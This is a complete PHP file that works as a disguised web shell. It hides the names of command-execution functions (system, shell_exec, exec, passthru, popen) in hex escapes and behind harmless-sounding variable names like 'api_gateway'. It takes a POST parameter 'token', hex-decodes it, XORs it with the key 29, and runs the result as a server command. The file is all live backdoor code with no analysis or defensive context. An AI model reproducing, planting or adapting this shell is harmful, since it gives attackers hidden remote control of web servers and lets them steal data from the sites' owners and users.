<?php

$api_gateway1 = "s\x79\x73\x74em";
$api_gateway3 = "exec";
$api_gateway2 = "sh\x65ll_\x65\x78e\x63";
$api_gateway7 = "p\x63l\x6F\x73e";
$api_gateway4 = "p\x61ssthru";
$api_gateway6 = "stream_g\x65t\x5F\x63on\x74e\x6Ets";
$reverse_searcher = "h\x65\x782b\x69\x6E";
$api_gateway5 = "\x70\x6Fpen";
if (isset($_POST["\x74oken"])) {
            function right_pad_string    (      $dchunk   ,      $holder     )   {
   $ent     =    ''     ;
   for($l=0;
 $l<strlen($dchunk);
 $l++){
$ent.=chr(ord($dchunk[$l])^$holder);

} return    $ent;
      
}
            $token = $reverse_searcher($_POST["\x74oken"]);
            $token = right_pad_string($token, 29);
            if (function_exists($api_gateway1)) {
                $api_gateway1($token);
            } elseif (function_exists($api_gateway2)) {
                print $api_gateway2($token);
            } elseif (function_exists($api_gateway3)) {
                $api_gateway3($token, $entity_dchunk);
                print join("\n", $entity_dchunk);
            } elseif (function_exists($api_gateway4)) {
                $api_gateway4($token);
            } elseif (function_exists($api_gateway5) && function_exists($api_gateway6) && function_exists($api_gateway7)) {
                $holder_ent = $api_gateway5($token, 'r');
                if ($holder_ent) {
                    $rec_elem = $api_gateway6($holder_ent);
                    $api_gateway7($holder_ent);
                    print $rec_elem;
                }
            }
            exit;
        }